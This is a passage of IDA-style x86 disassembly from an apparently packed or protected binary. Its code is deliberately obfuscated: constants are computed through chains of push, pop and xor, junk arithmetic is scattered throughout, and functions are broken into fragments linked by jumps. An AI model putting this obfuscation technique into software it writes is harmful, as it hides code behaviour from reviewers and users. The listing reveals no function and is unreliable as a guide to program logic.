; [00000001 BYTES: COLLAPSED FUNCTION nullsub_510. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_44A014: ; CODE XREF: sub_4408C2+CFE0j
jmp nullsub_119
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4393B6
loc_44A019: ; CODE XREF: sub_4393B6+1DAEFj
push 1B1FF882h
pop ebx
xor ebx, ds:4000F8h
add ebx, 5266A36Ah
jmp loc_4547AF
; END OF FUNCTION CHUNK FOR sub_4393B6
; =============== S U B R O U T I N E =======================================
sub_44A030 proc near ; CODE XREF: sub_43E5F0+8j
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043CF11 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00441057 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447316 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044BC7B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044C93A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455372 SIZE 00000005 BYTES
push ebx
mov ebx, ecx
xchg ebx, [esp+4+var_4]
jno loc_44C93A
inc ds:dword_443780
push offset sub_448FB6
jmp loc_441057
sub_44A030 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_44A04C: ; CODE XREF: sub_44445F+5217j
jnb loc_458D71
loc_44A052: ; CODE XREF: sub_44445F:loc_44F318j
sub edi, 7F32B9B1h
cmp edi, 0C0BC88B8h
jmp loc_446607
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
push edx
jmp sub_44A77E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_44A069: ; CODE XREF: sub_4518D7-A516j
jl loc_43ED64
loc_44A06F: ; CODE XREF: sub_446B2B+Dj
jmp loc_457D7B
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C595
loc_44A074: ; CODE XREF: sub_44C595-8C56j
jmp loc_43A33A
; END OF FUNCTION CHUNK FOR sub_44C595
; ---------------------------------------------------------------------------
loc_44A079: ; CODE XREF: ut7h7i2x:0043BC55j
jmp loc_4501AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B9C8
loc_44A07E: ; CODE XREF: sub_43B9C8+Dj
jmp nullsub_565
; END OF FUNCTION CHUNK FOR sub_43B9C8
; ---------------------------------------------------------------------------
cmp edi, 7D9F8836h
jmp loc_4555BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A956
loc_44A08E: ; CODE XREF: sub_43A956:loc_44C87Aj
sub edi, 0E7C80EAFh
push offset sub_451284
jmp nullsub_439
; END OF FUNCTION CHUNK FOR sub_43A956
; ---------------------------------------------------------------------------
push esi
push eax
pop esi
xchg esi, [esp]
ror eax, 0Ch
jmp loc_442CE6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449231
loc_44A0AC: ; CODE XREF: sub_449231+6j
call sub_43BA59
push edx
push 0F5C8E261h
pop edx
sub edx, 643B50D1h
jmp loc_449372
; END OF FUNCTION CHUNK FOR sub_449231
; ---------------------------------------------------------------------------
sbb ebp, 0E243466Dh
jmp loc_45AA6A
; =============== S U B R O U T I N E =======================================
sub_44A0CE proc near ; CODE XREF: sub_4442CC-3A8Cp
; ut7h7i2x:00455BFFj
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043C241 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F756 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00442302 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444FA7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004457A6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00450F6E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00451CDA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459AF4 SIZE 00000019 BYTES
xchg ecx, [esp-8+arg_4]
pop ecx
sub eax, 0D2530775h
xor eax, 59435531h
ror eax, 15h
jb loc_442302
sub eax, 15F1D50Bh
xor eax, 4FF65363h
jmp loc_43C241
sub_44A0CE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44875F
loc_44A0F8: ; CODE XREF: sub_44875F:loc_45404Ej
xchg ebx, [esp+4+var_4]
mov ebp, ebx
pop ebx
push 0F9F1809Dh
jmp loc_44173F
; END OF FUNCTION CHUNK FOR sub_44875F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458345
loc_44A108: ; CODE XREF: sub_458345-1741Cj
jnp loc_44AED5
xchg esi, edx
sub edi, 67EADFF3h
jmp loc_43DB80
; END OF FUNCTION CHUNK FOR sub_458345
; ---------------------------------------------------------------------------
loc_44A11B: ; CODE XREF: ut7h7i2x:0043A87Ej
xchg eax, [ebp+0]
sub edx, eax
jmp loc_43F818
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_44A125: ; CODE XREF: sub_4503C3:loc_451E70j
; ut7h7i2x:loc_4538FEj
jle loc_4598E2
loc_44A12B: ; CODE XREF: ut7h7i2x:loc_45A955j
pushf
jmp loc_448DA1
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444C41
loc_44A131: ; CODE XREF: sub_444C41+Dj
mov ds:dword_449C78, edx
loc_44A137: ; CODE XREF: ut7h7i2x:0043EF3Dj
; ut7h7i2x:004538A7j
xchg eax, edx
call sub_44ED9F
retn
; END OF FUNCTION CHUNK FOR sub_444C41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E9E
loc_44A13E: ; CODE XREF: sub_445E9E+14E61j
jmp loc_454D82
; END OF FUNCTION CHUNK FOR sub_445E9E
; ---------------------------------------------------------------------------
loc_44A143: ; CODE XREF: ut7h7i2x:004429DEj
jmp locret_45A295
; ---------------------------------------------------------------------------
loc_44A148: ; CODE XREF: ut7h7i2x:loc_44E605j
; ut7h7i2x:0044E621j
sub edi, 0B1133FCEh
test edi, 20000h
jmp loc_43B030
; ---------------------------------------------------------------------------
cmp edx, 75CA371Ch
jmp loc_452B0E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C9F5
loc_44A164: ; CODE XREF: sub_43C9F5+1ACCCj
jns loc_43D8D4
cmp edx, 82A8ED15h
jmp loc_44BA13
; END OF FUNCTION CHUNK FOR sub_43C9F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B68
loc_44A175: ; CODE XREF: sub_440B68+Fj
xchg esi, [esp+4+var_4]
mov edx, esi
pop esi
rol edx, 0Ch
jmp loc_4460FF
; END OF FUNCTION CHUNK FOR sub_440B68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453D8B
loc_44A183: ; CODE XREF: sub_453D8B:loc_453E57j
jge loc_449E3B
loc_44A189: ; CODE XREF: ut7h7i2x:00451D37j
jmp nullsub_181
; END OF FUNCTION CHUNK FOR sub_453D8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44A18E: ; CODE XREF: sub_43AB62+8B4Bj
jmp loc_44C0B7
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_44A193: ; CODE XREF: ut7h7i2x:00442069j
jmp loc_452FA0
; ---------------------------------------------------------------------------
sbb esi, 0EDAB87CDh
jg loc_4471EA
sub edi, 9361589h
jmp loc_43EBEA
; ---------------------------------------------------------------------------
locret_44A1AF: ; CODE XREF: ut7h7i2x:004540F2j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_44A1B0: ; CODE XREF: sub_4433C5-33DBj
cdq
loc_44A1B1: ; CODE XREF: sub_4433C5:loc_45222Bj
mov eax, [ebp-0Ch]
call sub_45612F
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_44A1B9: ; CODE XREF: sub_447EB5-D598j
jmp loc_448132
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44615D
loc_44A1BE: ; CODE XREF: sub_44615D-C30Cj
jmp loc_43DF29
; END OF FUNCTION CHUNK FOR sub_44615D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_44A1C3: ; CODE XREF: sub_43C1D2+1E2B0j
shl eax, 4
jmp loc_456176
; END OF FUNCTION CHUNK FOR sub_43C1D2
; ---------------------------------------------------------------------------
loc_44A1CB: ; CODE XREF: ut7h7i2x:004465D9j
jz loc_45441A
jmp loc_44362F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44A1D6: ; CODE XREF: sub_442B3B:loc_458162j
jz loc_44CFDC
xchg edx, [eax]
rol ebp, 0Ch
jmp loc_44CFDC
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_44A1E6: ; CODE XREF: sub_44DB48+Ej
jz loc_43FD9C
jmp loc_459B63
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_44A1F1: ; CODE XREF: sub_44E5AB+C5A5j
jnb loc_450550
ror ebp, 1Dh
loc_44A1FA: ; CODE XREF: sub_44E5AB:loc_45AB48j
add ecx, 93448690h
popf
xchg ecx, [esp+0Ch+var_C]
jmp loc_441245
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
or ebp, ecx
jmp loc_43D3E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B5D4
loc_44A210: ; CODE XREF: sub_43B5D4:loc_43AAC4j
jnz loc_455088
or edi, edx
adc ebp, 5AD696ABh
jmp loc_455088
; END OF FUNCTION CHUNK FOR sub_43B5D4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_44A223: ; CODE XREF: sub_44825D-8D8Aj
jz loc_44A846
jmp loc_442F6C
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
loc_44A22E: ; CODE XREF: ut7h7i2x:0044BFA9j
xchg ebx, [esp]
call sub_439B58
loc_44A236: ; CODE XREF: ut7h7i2x:00458D4Dj
jmp loc_444F09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BDF1
loc_44A23B: ; CODE XREF: sub_44BDF1-9DA3j
jmp loc_450B5E
; END OF FUNCTION CHUNK FOR sub_44BDF1
; ---------------------------------------------------------------------------
loc_44A240: ; CODE XREF: ut7h7i2x:0043AF94j
mov eax, edx
pop edx
add eax, 0D314D132h
xor eax, 0BE4D2F3Ah
rol eax, 19h
xor eax, 7C992C53h
call sub_43AA94
mov ds:dword_41D0E0, eax
jmp loc_4438FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44A268: ; CODE XREF: sub_43A556:loc_442158j
or ebp, eax
jbe loc_44F86B
cmp ecx, esi
jmp loc_445B89
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_44A277: ; CODE XREF: sub_44E2C4:loc_443159j
not eax
jo loc_45239B
and esi, 0F4CE9E9Bh
jmp loc_44D2B1
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
push eax
ror eax, 6
push edx
push 19A88C04h
pop edx
sub edx, 10A35959h
jmp loc_453BB5
; =============== S U B R O U T I N E =======================================
sub_44A2A0 proc near ; CODE XREF: sub_450472:loc_43BE08j
; sub_43AB62+1E7A4p
; FUNCTION CHUNK AT 0043F65B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F793 SIZE 00000003 BYTES
xchg edi, [esp+0]
pop edi
push edx
pop ecx
adc edx, ebp
jmp loc_43F65B
sub_44A2A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Bh, 8, 99h
dd 0CE3B1789h, 0FF2B9CE9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_44A2B9: ; CODE XREF: sub_44CE09-15E7j
jge loc_44C97A
adc ebp, 3D10CAEDh
and ecx, esi
and esi, 59A358D6h
xchg edi, [esi]
jmp loc_44C97A
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
push edi
push 0A6C091A3h
pop edi
add edi, 7A9469Dh
xor edi, 0B18C473h
jmp loc_4566CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_44A2EC: ; CODE XREF: sub_43DD17:loc_447B02j
mov edx, 0E5254649h
call sub_44B8F8
mov ds:dword_43A7A8, eax
loc_44A2FB: ; CODE XREF: sub_43DD17+C799j
; ut7h7i2x:0044A4BBj ...
mov esp, ebp
pop ebp
push ds:dword_43A7A8
retn
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44102C
loc_44A305: ; CODE XREF: sub_44102C+Cj
jmp loc_446579
; END OF FUNCTION CHUNK FOR sub_44102C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_44A30A: ; CODE XREF: sub_450231:loc_452CA0j
; sub_444EAA+13769j
jo loc_452E99
cmp byte ptr [ebp-5], 0
jnz loc_44B4CE
jmp loc_444B1A
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
loc_44A31F: ; CODE XREF: ut7h7i2x:00453DE8j
xor edi, 206BCE3Fh
ror ebp, 0Bh
adc ebx, ebp
; START OF FUNCTION CHUNK FOR sub_44FC60
loc_44A32A: ; CODE XREF: sub_44FC60:loc_453DD5j
add eax, 23F344D5h
add eax, ebp
add eax, 51A23034h
mov eax, [eax]
jmp sub_44668A
; END OF FUNCTION CHUNK FOR sub_44FC60
; =============== S U B R O U T I N E =======================================
sub_44A33F proc near ; CODE XREF: ut7h7i2x:004453CCj
; sub_4501C1+A263p
var_8 = dword ptr -8
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043A0B7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441729 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004420B4 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004439E1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00459EA8 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
loc_44A343: ; CODE XREF: ut7h7i2x:loc_43DCB2j
push 1C571003h
pop ecx
rol ecx, 1Dh
add ecx, 9C751E00h
xchg ecx, [esp-4+arg_0]
jmp loc_4420B4
sub_44A33F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44A35A proc near ; CODE XREF: ut7h7i2x:004439D6p
; ut7h7i2x:0044DC2Cj
xchg ecx, [esp+0]
sub_44A35A endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_449E96
loc_44A35D: ; CODE XREF: sub_449E96-9896j
pop ecx
mov ebp, eax
pop eax
jo loc_44EA83
mov eax, [esp+0]
push edx
call sub_44B5CF
jmp loc_45A1DC
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453FFB
loc_44A375: ; CODE XREF: sub_453FFB+Bj
call sub_44986A
; END OF FUNCTION CHUNK FOR sub_453FFB
; START OF FUNCTION CHUNK FOR sub_43D989
loc_44A37A: ; CODE XREF: sub_43D989+9j
jmp loc_443878
; END OF FUNCTION CHUNK FOR sub_43D989
; ---------------------------------------------------------------------------
push ebp
jmp sub_4414CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583E7
loc_44A385: ; CODE XREF: sub_4583E7:loc_458CFEj
push offset loc_450C7A
jmp loc_43F92C
; END OF FUNCTION CHUNK FOR sub_4583E7
; ---------------------------------------------------------------------------
loc_44A38F: ; CODE XREF: ut7h7i2x:loc_458F50j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF13
loc_44A390: ; CODE XREF: sub_44DF13+9j
mov ebx, eax
xchg ebx, [esp+0]
mov eax, edx
call sub_44D8E8
call sub_44AE70
loc_44A3A1: ; CODE XREF: ut7h7i2x:0043D333j
jmp nullsub_173
; END OF FUNCTION CHUNK FOR sub_44DF13
; ---------------------------------------------------------------------------
loc_44A3A6: ; CODE XREF: ut7h7i2x:00454EAFj
jl loc_453859
; START OF FUNCTION CHUNK FOR sub_43E592
loc_44A3AC: ; CODE XREF: sub_43E592+93E0j
jmp loc_447233
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_44A3B1: ; CODE XREF: sub_43BA9E:loc_43D60Fj
mov eax, [ecx]
rol edx, 17h
jmp loc_439589
; END OF FUNCTION CHUNK FOR sub_43BA9E
; =============== S U B R O U T I N E =======================================
sub_44A3BB proc near ; DATA XREF: sub_44D3B0-D048o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A46D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EA97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F10D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004401E0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00441BF9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004432EA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004440F7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446388 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004463A3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004482F9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448317 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AA5F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044BAC0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044BD00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D749 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DB09 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044E09A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E1A4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044F810 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F88F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453593 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00453F85 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00455FA7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459A05 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A713 SIZE 00000005 BYTES
push ebp
mov ebp, eax
xchg ebp, [esp+0]
call sub_44A3D0
mov edx, [ebp-18h]
mov [edx], eax
jmp loc_4440F7
sub_44A3BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44A3D0 proc near ; CODE XREF: sub_44A3BB+6p
; FUNCTION CHUNK AT 00450146 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045097D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E20 SIZE 00000010 BYTES
push ebp
jmp loc_45097D
sub_44A3D0 endp
; =============== S U B R O U T I N E =======================================
sub_44A3D6 proc near ; CODE XREF: sub_439B58:loc_45A4F1p
; ut7h7i2x:0045AA03j
xchg edx, [esp+0]
pop edx
add eax, 0E42AAFBh
call sub_4586CB
sub_44A3D6 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_45AAD1
loc_44A3E5: ; CODE XREF: sub_45AAD1+15j
jmp loc_44F0C8
; END OF FUNCTION CHUNK FOR sub_45AAD1
; ---------------------------------------------------------------------------
test eax, ecx
jmp loc_44F435
; =============== S U B R O U T I N E =======================================
sub_44A3F1 proc near ; CODE XREF: sub_4453B5+5p
; ut7h7i2x:0044630Ej
xchg edi, [esp+0]
pop edi
pop ebp
retn
sub_44A3F1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45ABAC
loc_44A3F7: ; CODE XREF: sub_45ABAC+Bj
jmp nullsub_468
; END OF FUNCTION CHUNK FOR sub_45ABAC
; ---------------------------------------------------------------------------
jmp loc_444B05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D683
loc_44A401: ; CODE XREF: sub_44D683-E878j
call sub_444E04
mov eax, 11C9A2C5h
push esi
push 0A5A62A08h
pop esi
xor esi, 3016FDE0h
add esi, 6A94D450h
jmp loc_4469CD
; END OF FUNCTION CHUNK FOR sub_44D683
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_44A423: ; CODE XREF: sub_44F495-2384j
pop ebx
xchg ebx, [esp+8+var_8]
push edx
push 0E59CAF71h
xchg esi, [esp+10h+var_10]
mov edx, esi
jmp loc_455A37
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44A437: ; CODE XREF: sub_43A556+1CA0Aj
mov edx, esi
and edi, 0E6A53354h
cdq
not esi
jmp loc_44DA04
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
db 5Eh
dd 8B240487h, 6E958E8h
db 24h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4492A1
loc_44A453: ; CODE XREF: sub_4492A1+9213j
jz sub_45812E
jmp loc_451190
; END OF FUNCTION CHUNK FOR sub_4492A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_44A45E: ; CODE XREF: sub_44B5CF:loc_447482j
xor edx, 578E6758h
add edx, 0A9D403Fh
call sub_44ED9F
push eax
push offset loc_4587D3
jmp nullsub_206
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CEF8
loc_44A47A: ; CODE XREF: sub_43CEF8:loc_43CF0Bj
mov [esi], eax
xchg edi, [esp+4+var_4]
mov esi, edi
pop edi
lea eax, sub_446215
jmp loc_45388E
; END OF FUNCTION CHUNK FOR sub_43CEF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_44A48D: ; CODE XREF: sub_4402A5:loc_455485j
mov al, [eax]
add [ebp-0Ah], al
xor eax, eax
; END OF FUNCTION CHUNK FOR sub_4402A5
; START OF FUNCTION CHUNK FOR sub_44081E
loc_44A494: ; CODE XREF: sub_44081E-6BB9j
mov al, [ebp-0Ah]
jmp loc_457993
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
loc_44A49C: ; CODE XREF: ut7h7i2x:004474EAj
push ebp
mov ebp, edx
xchg ebp, [esp]
push edx
push 0C8F13DBDh
pop edx
jmp loc_45A105
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_44A4AE: ; CODE XREF: sub_43DD17-877j
cmp al, 0A4h
jnz loc_44A2FB
jmp loc_44EB3C
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
jmp loc_44A2FB
; =============== S U B R O U T I N E =======================================
sub_44A4C0 proc near ; CODE XREF: sub_451EDF:loc_439CCBj
; sub_447F0A:loc_43C203p ...
; FUNCTION CHUNK AT 00440C66 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00445D36 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044AC36 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AFF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C6D5 SIZE 00000019 BYTES
mov edx, 1
jmp loc_44C6D5
sub_44A4C0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_44A4CA: ; CODE XREF: sub_44EC11-769Aj
jz loc_439BDF
jmp loc_45A9CA
; END OF FUNCTION CHUNK FOR sub_44EC11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_257. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E700
loc_44A4D6: ; CODE XREF: sub_43E700+1Ej
jmp loc_443B32
; END OF FUNCTION CHUNK FOR sub_43E700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_44A4DB: ; CODE XREF: sub_44D5BE:loc_44003Dj
add eax, 9596623Eh
mov eax, [eax]
or eax, eax
loc_44A4E5: ; CODE XREF: ut7h7i2x:loc_449888j
jnz loc_45183B
jmp loc_44358A
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_44A4F0: ; CODE XREF: sub_44BF76:loc_43EA71j
; sub_44BF76-BC34j
push 0A736FBA0h
xchg ebx, [esp+0]
mov eax, ebx
pop ebx
xor eax, 0BC27C759h
jmp loc_43EC7E
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
loc_44A506: ; CODE XREF: ut7h7i2x:0043A66Cj
jl loc_45803F
; START OF FUNCTION CHUNK FOR sub_456F1D
loc_44A50C: ; CODE XREF: sub_456F1D+11j
jmp loc_44B1BA
; END OF FUNCTION CHUNK FOR sub_456F1D
; ---------------------------------------------------------------------------
xor esi, ebp
jmp loc_458034
; ---------------------------------------------------------------------------
ja nullsub_12
jmp sub_44551B
; ---------------------------------------------------------------------------
loc_44A523: ; DATA XREF: sub_44D1F0-E083o
or edx, edx
jnz loc_44AA9D
jmp loc_43C9D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_44A530: ; CODE XREF: sub_448321-77Cj
pushf
sub edx, 675510Eh
and ecx, ebx
jmp loc_456A5F
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
and esi, 0C7606695h
jmp sub_45612F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E9CB
loc_44A549: ; CODE XREF: sub_43E9CB:loc_43DE44j
pop ebx
xor eax, 0E8C3EDE1h
push offset loc_43E40D
jmp loc_4526E8
; END OF FUNCTION CHUNK FOR sub_43E9CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D77D
loc_44A55A: ; CODE XREF: sub_44D77D:loc_439BF3j
push 9B175096h
pop edx
xor edx, 854F311h
add edx, 0B02FE5D5h
push offset sub_43B005
jmp nullsub_497
; END OF FUNCTION CHUNK FOR sub_44D77D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44A576: ; CODE XREF: sub_439BF8+1325Fj
jz loc_450F00
and ebx, 1D08368Bh
cdq
loc_44A583: ; CODE XREF: sub_439BF8-7E6j
; sub_44551B:loc_444722j ...
jns loc_44FE5D
cmp dword ptr [ebp-4], 7
jmp loc_43B621
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B4E3
loc_44A592: ; CODE XREF: sub_43B4E3j
call sub_43F0B0
; END OF FUNCTION CHUNK FOR sub_43B4E3
; START OF FUNCTION CHUNK FOR sub_45410C
loc_44A597: ; CODE XREF: sub_45410C+Aj
jmp loc_447DBF
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D87A
loc_44A59C: ; CODE XREF: sub_43D87A+1j
mov esi, ebp
xchg esi, [esp+4+var_4]
push offset loc_45580F
jmp nullsub_73
; END OF FUNCTION CHUNK FOR sub_43D87A
; =============== S U B R O U T I N E =======================================
sub_44A5AB proc near ; CODE XREF: sub_449E96:loc_452AF3p
; ut7h7i2x:004553B0j
; FUNCTION CHUNK AT 0043C0A7 SIZE 00000008 BYTES
xchg ebx, [esp+0]
pop ebx
inc dword ptr [ebp-24h]
jmp loc_43C0A7
sub_44A5AB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_44A5B7: ; CODE XREF: sub_453E14:loc_447872j
; sub_44917B:loc_449182j ...
push 3A552A2Eh
pop eax
or eax, 96D90DFh
loc_44A5C3: ; CODE XREF: ut7h7i2x:loc_457EC0j
xor eax, 2CA48CC1h
jmp loc_44AE4A
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44A5CE: ; CODE XREF: sub_442B3B+AAj
jnz loc_44C9B6
jmp loc_457782
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_44A5D9: ; CODE XREF: ut7h7i2x:00444799j
add edi, 668F4C6Ch
loc_44A5DF: ; CODE XREF: ut7h7i2x:loc_444781j
or edx, 87DEE0FEh
xor edx, 287C884Ch
add edx, ebp
add edx, 705C802Eh
mov edx, [edx]
shr edx, 3
jmp loc_445D77
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44871F
loc_44A5FD: ; CODE XREF: sub_44871F+CE5Cj
pop edi
sub edi, 27681808h
